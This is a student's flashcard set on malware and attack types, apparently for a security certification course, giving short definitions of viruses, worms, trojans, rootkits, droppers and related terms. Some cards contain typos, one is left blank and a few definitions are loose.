2.4 Flashcards
Brute force Attacks
forcible entry
tampering with security devices
confronting security personnel
ramming barriers with vehicles
Viruses and types
Made up of malicious code thats run a machine without a users knowledge
boot sector
macro
program
multipartite
encrypted
polymorphic
metamorphic
stealth
armored
hoax
boot sector virus
stored on first section of hard drive and is loaded into memory when the computer is booted
Macro virus
form of code that allows a virus to be embedded inside another document
Program virus
multipartite virus
combo of boot virus and program virus
encrypted virus
designed to hide itself from being detected by encrypting its malcious code so anti virus software will not detect it
Polymorphic virus
advanced form of encrypted, it changes the viruses code each time it is executed by altering the decryption module in order for it to evade detection
Metamorphic virus
more advanced then polymorhpic able to rewrite themselves entirely before it attempts to infect a given file
stealth virus
technique used to prevent the virus from being detected by the anti virus software
armored virus
have a layer of protection to confuse a program or a person who is trying to analyze it
hoax
form of technical social engineering that attempts to scare our end users into taking some kind of undesirable action on their system (a message pops up saying you have a virus and gives you steps to remove it)
worm
unlike a virus that requires a user action, a worm replicates itself in the network without any action it takes advantage of vulnerabilities in os or apps aka missing security patches
it is malicious software
trojan
piece of malicious code that is disguised as harmless or desirable software could be a tetris game for example
RAT Remote Access Trojan
widely used by modern attackers because it provides the attacker with remote control of a victim machine
Ransomeware
type of malicious software designed to block access to a system by encrypting data until a ransom is paid
Zombies
Name of a compromised system that is part of a botnet. It is used to perform tasks using remote commands from the attacker without user knowledge
attakers often use only 20-25% of zombies power
Botnet
a network compromised of zombies controlled by malicious actors
mostly used for DDoS
Command and Control Node
Computer responsible for managing and coordinating the activities of other nodes or devices within a network
Rootkit
Digs deeply into OS to embed itself there and gain admin privileges over a system without being detected
can open and shut ports, delete programs install programs etc
Ring 3
outermost ring where user permissions are used
Ring 0
inntermost or highest permission level aka kernel mode
kernel mode
allows a system to control access to things like device drivers, sound card, monitor etc
DLL Injection
Technique used to run arbitrary code within the address space of another process by forcing it to load a dynamic link library
DLL
Dynamic Link Library
collection of code and data that can be used by multiple programs simultaneously to allow for code reuse and modularization in software development
device drivers for example have dll programs
Shim
piece of software code that is placed between two components and that intercepts the calls between those components and can redirect them can be used to -non maliciously or maliciously. Use code signing
Backdoor
originally placed in computer programs to bypass normal authentication functions most often by programmers
Easter Egg
a hidden feature or novelty within a program usually an inside joke. Generally these have a lot of vulnerabilities because they arent tested as rigorously and are added right before the program is completed
logic bombs
malicious code inserted into a program and only executes when certain conditions are met. fired employee may do it
keylogger
software or hardware that records keystrokes
software keylogger
usually delivered through social engineering attack like phishing
hardware keylogger
physical device that is plugged into the computer. anti virus software may not detect and think its a real keyboard
spyware
malicious software that is designed to gather and send info about a user or org without their knowledge
bloatware
any pre-installed software that you did not specifically request. It wastes storage space, slows performance etc
malware exploitation technique
specific method by which malware code penetrates and infects a targeted system
fileless malware
used to create process in the system memory without relying on the local file system of the infected host
anti irus software usually scans the filesystem however fileless malware relies on RAM making it difficult to detect. It maintains persistence and evades signature based detection methods. It bypasses many traditional security measures
stage 1 dropper or downloaded
piece of malware that is usually created as a lightweight shell code that can be executed on a given systemdro
the goal is to establish a foothold in a system but it doesnt perform a significant amount of malicious actions it is the initial infection
dropper
specific type of malware designed to initiate or run other malware forms within a payload on an infected host
downloader
retrieve additional tools post the initial infection facilitated by a dropper
shell code
broader term that encompasses the lightweight code meant to execute an exploit on a given targer
stage 2 downloader
downloads and installs a remote acess trojan to conduct command and control on the victimized system